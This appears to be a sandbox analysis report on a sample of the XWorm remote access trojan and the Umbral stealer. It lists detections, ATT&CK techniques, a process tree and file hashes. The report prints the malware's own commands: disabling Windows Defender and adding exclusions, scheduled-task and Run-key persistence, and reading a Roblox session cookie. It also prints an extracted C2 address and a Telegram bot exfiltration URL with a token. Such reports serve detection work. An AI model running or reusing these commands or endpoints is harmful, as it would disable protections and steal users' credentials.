umbral | 4589073aab658c11af8490bc2d39d8b7c6d16e313320a9c67a6cbb7408f8af4a

Resubmissions

11-08-2024 23:49

240811-3t2svszbkg 10

10-08-2024 12:02

240810-n7h6caybrp 10

Analysis

max time kernel
1749s
max time network
1795s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
10-08-2024 12:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ExReporterFIX.exe
Size

65KB
MD5

5d36dc879659d7eecf5a0867bbd05165
SHA1

d23b8a98691b5a0379f761ea1669869690e3fd9f
SHA256

4589073aab658c11af8490bc2d39d8b7c6d16e313320a9c67a6cbb7408f8af4a
SHA512

854bc8b9406bcc57cc56ff4d19bae4cc8a18a4fa4f4543c6064413e004a34386dec35dfd617c181d163d5038e068fd442a4eb4a45caa9905c78c29ee210864f4
SSDEEP

1536:kxJhEM7T/hC+xaaGbb05/Txd4j6txHO56197:YJ+MnheaMb0NHO56f7

Score

10^/10

umbral xworm credential_access discovery execution persistence rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

21.ip.gl.ply.gg:21222

Attributes

Install_directory
%LocalAppData%
install_file
ExReporters.exe
telegram
https://api.telegram.org/bot7307556336:AAFxy7gvsomu0v1K0jbYvC1K7DBoqhWv9ek/sendMessage?chat_id=1748805076

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral4/files/0x000100000002aaf6-83.dat	family_umbral
behavioral4/memory/5876-90-0x000002B548B30000-0x000002B548B70000-memory.dmp	family_umbral

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral4/memory/4100-1-0x0000000000740000-0x0000000000756000-memory.dmp	family_xworm
behavioral4/files/0x000800000002aad2-57.dat	family_xworm

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4120	powershell.exe
5176	powershell.exe
3168	powershell.exe
4360	powershell.exe
2508	powershell.exe
1376	powershell.exe
2008	powershell.exe
3488	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	yufght.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ExReporters.lnk	ExReporterFIX.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ExReporters.lnk	ExReporterFIX.exe

Executes dropped EXE 30 IoCs

pid	Process
2144	ExReporters.exe
2456	ExReporters.exe
5212	ExReporters.exe
2716	ExReporters.exe
5976	ExReporters.exe
5452	ExReporters.exe
5720	ExReporters.exe
2744	ExReporters.exe
1672	ExReporters.exe
3320	ExReporters.exe
1312	ExReporters.exe
5096	ExReporters.exe
6140	ExReporters.exe
332	ExReporters.exe
4000	ExReporters.exe
1988	ExReporters.exe
2784	ExReporters.exe
2136	ExReporters.exe
5876	yufght.exe
2744	ExReporters.exe
4108	ExReporters.exe
704	ExReporters.exe
5480	ExReporters.exe
1500	ExReporters.exe
1224	ExReporters.exe
340	ExReporters.exe
1160	ExReporters.exe
3956	ExReporters.exe
3120	ExReporters.exe
1596	ExReporters.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-242286936-336880687-2152680090-1000\Software\Microsoft\Windows\CurrentVersion\Run\ExReporters = "C:\\Users\\Admin\\AppData\\Local\\ExReporters.exe"	ExReporterFIX.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
3	discord.com
19	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com
3	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3296	cmd.exe
4080	PING.EXE

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2364	wmic.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4080	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4844	schtasks.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
3168	powershell.exe
3168	powershell.exe
4360	powershell.exe
4360	powershell.exe
2508	powershell.exe
2508	powershell.exe
4120	powershell.exe
4120	powershell.exe
4100	ExReporterFIX.exe
5876	yufght.exe
5176	powershell.exe
5176	powershell.exe
1376	powershell.exe
1376	powershell.exe
2008	powershell.exe
2008	powershell.exe
3428	powershell.exe
3428	powershell.exe
3488	powershell.exe
3488	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4100	ExReporterFIX.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4100	ExReporterFIX.exe
Token: SeDebugPrivilege	3168	powershell.exe
Token: SeDebugPrivilege	4360	powershell.exe
Token: SeDebugPrivilege	2508	powershell.exe
Token: SeDebugPrivilege	4120	powershell.exe
Token: SeDebugPrivilege	4100	ExReporterFIX.exe
Token: SeDebugPrivilege	2144	ExReporters.exe
Token: SeDebugPrivilege	2456	ExReporters.exe
Token: SeDebugPrivilege	5212	ExReporters.exe
Token: SeDebugPrivilege	2716	ExReporters.exe
Token: SeDebugPrivilege	5976	ExReporters.exe
Token: SeDebugPrivilege	5452	ExReporters.exe
Token: SeDebugPrivilege	5720	ExReporters.exe
Token: SeDebugPrivilege	2744	ExReporters.exe
Token: SeDebugPrivilege	1672	ExReporters.exe
Token: SeDebugPrivilege	3320	ExReporters.exe
Token: SeDebugPrivilege	1312	ExReporters.exe
Token: SeDebugPrivilege	5096	ExReporters.exe
Token: SeDebugPrivilege	6140	ExReporters.exe
Token: SeDebugPrivilege	332	ExReporters.exe
Token: SeDebugPrivilege	4000	ExReporters.exe
Token: SeDebugPrivilege	1988	ExReporters.exe
Token: SeDebugPrivilege	2784	ExReporters.exe
Token: SeDebugPrivilege	2136	ExReporters.exe
Token: SeDebugPrivilege	5876	yufght.exe
Token: SeIncreaseQuotaPrivilege	1868	wmic.exe
Token: SeSecurityPrivilege	1868	wmic.exe
Token: SeTakeOwnershipPrivilege	1868	wmic.exe
Token: SeLoadDriverPrivilege	1868	wmic.exe
Token: SeSystemProfilePrivilege	1868	wmic.exe
Token: SeSystemtimePrivilege	1868	wmic.exe
Token: SeProfSingleProcessPrivilege	1868	wmic.exe
Token: SeIncBasePriorityPrivilege	1868	wmic.exe
Token: SeCreatePagefilePrivilege	1868	wmic.exe
Token: SeBackupPrivilege	1868	wmic.exe
Token: SeRestorePrivilege	1868	wmic.exe
Token: SeShutdownPrivilege	1868	wmic.exe
Token: SeDebugPrivilege	1868	wmic.exe
Token: SeSystemEnvironmentPrivilege	1868	wmic.exe
Token: SeRemoteShutdownPrivilege	1868	wmic.exe
Token: SeUndockPrivilege	1868	wmic.exe
Token: SeManageVolumePrivilege	1868	wmic.exe
Token: 33	1868	wmic.exe
Token: 34	1868	wmic.exe
Token: 35	1868	wmic.exe
Token: 36	1868	wmic.exe
Token: SeIncreaseQuotaPrivilege	1868	wmic.exe
Token: SeSecurityPrivilege	1868	wmic.exe
Token: SeTakeOwnershipPrivilege	1868	wmic.exe
Token: SeLoadDriverPrivilege	1868	wmic.exe
Token: SeSystemProfilePrivilege	1868	wmic.exe
Token: SeSystemtimePrivilege	1868	wmic.exe
Token: SeProfSingleProcessPrivilege	1868	wmic.exe
Token: SeIncBasePriorityPrivilege	1868	wmic.exe
Token: SeCreatePagefilePrivilege	1868	wmic.exe
Token: SeBackupPrivilege	1868	wmic.exe
Token: SeRestorePrivilege	1868	wmic.exe
Token: SeShutdownPrivilege	1868	wmic.exe
Token: SeDebugPrivilege	1868	wmic.exe
Token: SeSystemEnvironmentPrivilege	1868	wmic.exe
Token: SeRemoteShutdownPrivilege	1868	wmic.exe
Token: SeUndockPrivilege	1868	wmic.exe
Token: SeManageVolumePrivilege	1868	wmic.exe
Token: 33	1868	wmic.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4100	ExReporterFIX.exe

Suspicious use of WriteProcessMemory 38 IoCs

description	pid	Process	procid_target
PID 4100 wrote to memory of 3168	4100	ExReporterFIX.exe	83
PID 4100 wrote to memory of 3168	4100	ExReporterFIX.exe	83
PID 4100 wrote to memory of 4360	4100	ExReporterFIX.exe	85
PID 4100 wrote to memory of 4360	4100	ExReporterFIX.exe	85
PID 4100 wrote to memory of 2508	4100	ExReporterFIX.exe	87
PID 4100 wrote to memory of 2508	4100	ExReporterFIX.exe	87
PID 4100 wrote to memory of 4120	4100	ExReporterFIX.exe	89
PID 4100 wrote to memory of 4120	4100	ExReporterFIX.exe	89
PID 4100 wrote to memory of 4844	4100	ExReporterFIX.exe	91
PID 4100 wrote to memory of 4844	4100	ExReporterFIX.exe	91
PID 4100 wrote to memory of 5876	4100	ExReporterFIX.exe	111
PID 4100 wrote to memory of 5876	4100	ExReporterFIX.exe	111
PID 5876 wrote to memory of 1868	5876	yufght.exe	112
PID 5876 wrote to memory of 1868	5876	yufght.exe	112
PID 5876 wrote to memory of 836	5876	yufght.exe	115
PID 5876 wrote to memory of 836	5876	yufght.exe	115
PID 5876 wrote to memory of 5176	5876	yufght.exe	117
PID 5876 wrote to memory of 5176	5876	yufght.exe	117
PID 5876 wrote to memory of 1376	5876	yufght.exe	119
PID 5876 wrote to memory of 1376	5876	yufght.exe	119
PID 5876 wrote to memory of 2008	5876	yufght.exe	121
PID 5876 wrote to memory of 2008	5876	yufght.exe	121
PID 5876 wrote to memory of 3428	5876	yufght.exe	123
PID 5876 wrote to memory of 3428	5876	yufght.exe	123
PID 5876 wrote to memory of 1520	5876	yufght.exe	125
PID 5876 wrote to memory of 1520	5876	yufght.exe	125
PID 5876 wrote to memory of 340	5876	yufght.exe	127
PID 5876 wrote to memory of 340	5876	yufght.exe	127
PID 5876 wrote to memory of 1000	5876	yufght.exe	129
PID 5876 wrote to memory of 1000	5876	yufght.exe	129
PID 5876 wrote to memory of 3488	5876	yufght.exe	131
PID 5876 wrote to memory of 3488	5876	yufght.exe	131
PID 5876 wrote to memory of 2364	5876	yufght.exe	133
PID 5876 wrote to memory of 2364	5876	yufght.exe	133
PID 5876 wrote to memory of 3296	5876	yufght.exe	135
PID 5876 wrote to memory of 3296	5876	yufght.exe	135
PID 3296 wrote to memory of 4080	3296	cmd.exe	137
PID 3296 wrote to memory of 4080	3296	cmd.exe	137

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
836	attrib.exe

C:\Users\Admin\AppData\Local\Temp\ExReporterFIX.exe
"C:\Users\Admin\AppData\Local\Temp\ExReporterFIX.exe"
1⤵
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4100
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ExReporterFIX.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3168
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ExReporterFIX.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4360
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\ExReporters.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2508
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ExReporters.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4120
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "ExReporters" /tr "C:\Users\Admin\AppData\Local\ExReporters.exe"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:4844
- C:\Users\Admin\AppData\Local\Temp\yufght.exe
  "C:\Users\Admin\AppData\Local\Temp\yufght.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5876
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1868
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\yufght.exe"
    3⤵
    - Views/modifies file attributes
    PID:836
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\yufght.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:5176
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1376
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2008
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3428
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    PID:1520
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:340
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:1000
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3488
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:2364
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\yufght.exe" && pause
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Suspicious use of WriteProcessMemory
    PID:3296
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:4080

C:\Users\Admin\AppData\Local\ExReporters.exe
C:\Users\Admin\AppData\Local\ExReporters.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2144

C:\Users\Admin\AppData\Local\ExReporters.exe
C:\Users\Admin\AppData\Local\ExReporters.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2456

C:\Users\Admin\AppData\Local\ExReporters.exe
C:\Users\Admin\AppData\Local\ExReporters.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5212

C:\Users\Admin\AppData\Local\ExReporters.exe
C:\Users\Admin\AppData\Local\ExReporters.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2716

C:\Users\Admin\AppData\Local\ExReporters.exe
C:\Users\Admin\AppData\Local\ExReporters.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5976

C:\Users\Admin\AppData\Local\ExReporters.exe
C:\Users\Admin\AppData\Local\ExReporters.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5452

C:\Users\Admin\AppData\Local\ExReporters.exe
C:\Users\Admin\AppData\Local\ExReporters.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5720

C:\Users\Admin\AppData\Local\ExReporters.exe
C:\Users\Admin\AppData\Local\ExReporters.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2744

C:\Users\Admin\AppData\Local\ExReporters.exe
C:\Users\Admin\AppData\Local\ExReporters.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1672

C:\Users\Admin\AppData\Local\ExReporters.exe
C:\Users\Admin\AppData\Local\ExReporters.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3320

C:\Users\Admin\AppData\Local\ExReporters.exe
C:\Users\Admin\AppData\Local\ExReporters.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1312

C:\Users\Admin\AppData\Local\ExReporters.exe
C:\Users\Admin\AppData\Local\ExReporters.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5096

C:\Users\Admin\AppData\Local\ExReporters.exe
C:\Users\Admin\AppData\Local\ExReporters.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6140

C:\Users\Admin\AppData\Local\ExReporters.exe
C:\Users\Admin\AppData\Local\ExReporters.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:332

C:\Users\Admin\AppData\Local\ExReporters.exe
C:\Users\Admin\AppData\Local\ExReporters.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4000

C:\Users\Admin\AppData\Local\ExReporters.exe
C:\Users\Admin\AppData\Local\ExReporters.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1988

C:\Users\Admin\AppData\Local\ExReporters.exe
C:\Users\Admin\AppData\Local\ExReporters.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2784

C:\Users\Admin\AppData\Local\ExReporters.exe
C:\Users\Admin\AppData\Local\ExReporters.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2136

C:\Users\Admin\AppData\Local\ExReporters.exe
C:\Users\Admin\AppData\Local\ExReporters.exe
1⤵
- Executes dropped EXE
PID:2744

C:\Users\Admin\AppData\Local\ExReporters.exe
C:\Users\Admin\AppData\Local\ExReporters.exe
1⤵
- Executes dropped EXE
PID:4108

C:\Users\Admin\AppData\Local\ExReporters.exe
C:\Users\Admin\AppData\Local\ExReporters.exe
1⤵
- Executes dropped EXE
PID:704

C:\Users\Admin\AppData\Local\ExReporters.exe
C:\Users\Admin\AppData\Local\ExReporters.exe
1⤵
- Executes dropped EXE
PID:5480

C:\Users\Admin\AppData\Local\ExReporters.exe
C:\Users\Admin\AppData\Local\ExReporters.exe
1⤵
- Executes dropped EXE
PID:1500

C:\Users\Admin\AppData\Local\ExReporters.exe
C:\Users\Admin\AppData\Local\ExReporters.exe
1⤵
- Executes dropped EXE
PID:1224

C:\Users\Admin\AppData\Local\ExReporters.exe
C:\Users\Admin\AppData\Local\ExReporters.exe
1⤵
- Executes dropped EXE
PID:340

C:\Users\Admin\AppData\Local\ExReporters.exe
C:\Users\Admin\AppData\Local\ExReporters.exe
1⤵
- Executes dropped EXE
PID:1160

C:\Users\Admin\AppData\Local\ExReporters.exe
C:\Users\Admin\AppData\Local\ExReporters.exe
1⤵
- Executes dropped EXE
PID:3956

C:\Users\Admin\AppData\Local\ExReporters.exe
C:\Users\Admin\AppData\Local\ExReporters.exe
1⤵
- Executes dropped EXE
PID:3120

C:\Users\Admin\AppData\Local\ExReporters.exe
C:\Users\Admin\AppData\Local\ExReporters.exe
1⤵
- Executes dropped EXE
PID:1596

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\ExReporters.exe

Filesize
65KB

MD5
5d36dc879659d7eecf5a0867bbd05165

SHA1
d23b8a98691b5a0379f761ea1669869690e3fd9f

SHA256
4589073aab658c11af8490bc2d39d8b7c6d16e313320a9c67a6cbb7408f8af4a

SHA512
854bc8b9406bcc57cc56ff4d19bae4cc8a18a4fa4f4543c6064413e004a34386dec35dfd617c181d163d5038e068fd442a4eb4a45caa9905c78c29ee210864f4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ExReporters.exe.log

Filesize
654B

MD5
2cbbb74b7da1f720b48ed31085cbd5b8

SHA1
79caa9a3ea8abe1b9c4326c3633da64a5f724964

SHA256
e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3

SHA512
ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d83390747e5505381804b667295b9cc2

SHA1
375354f1dc42f01391a773eed0b03c90c9f43f10

SHA256
1d175f7dfb53c4379407c61cb0adf20dce7dad359962ba7e554e49cb074214eb

SHA512
b418cda7d728a1314497089be632f66057f9556c9724d496f08a0de05528a631680bbfdc0fc9cd76bdc8fd10bf46d299f74b6822d7af39b1d883aa8d8db9d418

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
d80c90c20d0f5c8f07229716f2beffef

SHA1
42dcd92a3a1059e5e559e1cd110ec98a3ac45e3e

SHA256
5ba478485882ee7c7aa928af8c98e7754e876887e00a0c69520d20bd4926e7f6

SHA512
d6a4b14a52154db7c5af19e60910774d61704e7a6243ba5f73e11f7b692ea75840730e04eaccb59387021edf57506e0c2999e4237e8d921a01053eb4a3274ecf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
57083a8e45ebe4fd84c7c0f137ec3e21

SHA1
857b5ea57f7bcf03cadee122106c6e58792a9b84

SHA256
f20102c4dc409cad3cdaf7a330c3a18a730a9d7d902b9fbee2a84186cba93d40

SHA512
4bbc21c07c05ee1f783242f0fb59324d5ff9ae18bdf892f02980d582fed83380888eeba58e1a6a321507cfd5d4fe82a328a0d3482b29633be4e3ebbeac636f87

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b48c0758a60ef1ba38ebfb0295f242d8

SHA1
fc3fb7bf47deed51bf6b7071506b0fab1fbff77e

SHA256
9c3f7748557b68bbb4bee98c8f244758ba43a6dca019970a54b6633a577825fe

SHA512
d4b48f3587771de93a4d6fc31cd7c8d66ee0ebce522598b49e5facab870f12d189d2a163e22ee1a8dd3b1149dc4a99377454ca611b2cf26e8658671a2f50d664

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
2e8eb51096d6f6781456fef7df731d97

SHA1
ec2aaf851a618fb43c3d040a13a71997c25bda43

SHA256
96bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864

SHA512
0a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
25a74eab9c38ac32d360f682ce745f37

SHA1
a067acd29d50e1c07de8761f3d81c1625c57830c

SHA256
924e37739252c5414d21633f9df518d448001fd20ff791b05e07ea592fedb310

SHA512
bbe22b3074ce5b96e5e5177fa557857f0a6ac164b691b4f6fb8a1fd309970b1aa8a845b221873282af62f95254c211df71411209103286537f906365f8400cf9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
052b734e3d0b49bccde40def527c10df

SHA1
2ac7c9bd7dc7bd54699fd06252a89a963e1c1ec0

SHA256
d51b94b595a5bee567d89011dc8d97f6210a7911828e5a24172708d5a177f65f

SHA512
bbe94350f51a4029f44631e5bb6658d9583d46011db3ca3159a21b179ab7dc7b200a27ccdf34897fdcba890acec2cdb84a2c1ba0cd95360478e38e911f56f4ba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
8f0fb568a4039ad343af75eb8a5b2c7c

SHA1
1af592a1c239b33f68c0307c5d91337867283721

SHA256
dc6593ad5dba45aa94ea099ee8bb1282a0ea197e589689a8341ab4447a53c63b

SHA512
acb39df076427bd143c809c86518b74fcd40cfbfc177405d20d29a56a144b019ccf8cf4333c8914bd14e2c88357fb24d5ccd4bc514beef60278b7b87d13294b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rrtc0w1j.i2x.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\yufght.exe

Filesize
231KB

MD5
3849d45ec08cbd9a77c5852372b2689a

SHA1
fb26ba243dc3b9016636a40320f8c3b94d152b36

SHA256
3e688ce2a65cec47ac034d421726f0dd127a59e4120fe6e8de6fcb34bd8513e1

SHA512
